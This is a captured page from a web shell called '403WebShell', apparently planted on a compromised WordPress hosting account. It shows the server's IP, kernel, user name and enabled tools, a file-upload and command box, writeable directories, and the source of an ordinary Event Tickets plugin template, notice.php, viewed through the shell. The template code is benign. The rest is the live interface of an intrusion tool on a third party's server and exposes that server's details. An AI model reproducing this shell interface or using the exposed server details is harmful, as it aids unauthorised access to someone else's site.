Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 18.227.209.89
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/wavevlvu/misswavenigeria.com/wp-content/plugins/event-tickets/src/views/components/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/wavevlvu/misswavenigeria.com/wp-content/plugins/event-tickets/src/views/components/notice.php
<?php
/**
 * View: Notice
 *
 * Override this template in your own theme by creating a file at:
 * [your-theme]/tribe/components/notice.php
 *
 * See more documentation about our views templating system.
 *
 * @link https://evnt.is/1amp Help article for RSVP & Ticket template files.
 *
 * @version 4.12.0
 *
 */

$notice_classes  = [ 'tribe-tickets__notice' ];
$content_classes = [
	'tribe-common-b2',
	'tribe-tickets-notice__content'
];
$id              = $this->get( 'id' );
$title           = $this->get( 'title' ) ?: '';
$content         = $this->get( 'content' );
$c_classes       = $this->get( 'content_classes' ) ?: [];
$n_classes       = $this->get( 'notice_classes' ) ?: [];
$notice_classes  = array_merge( $notice_classes, (array) $n_classes );
$content_classes = array_merge( $content_classes, (array) $c_classes );

if ( empty( $content ) && empty( $title ) ) {
	return;
}

?>
<div id="<?php echo esc_attr( $id ); ?>" <?php tribe_classes( $notice_classes ); ?>>
	<?php if ( ! empty( $title ) ) : ?>
		<h3 class="tribe-common-h7 tribe-tickets-notice__title"><?php echo esc_html( $title ); ?></h3>
	<?php endif; ?>

	<div <?php tribe_classes( $content_classes ); ?>>
		<?php echo wp_kses_post( $content ); ?>
	</div>
</div>

Youez - 2016 - github.com/yon3zu
LinuXploit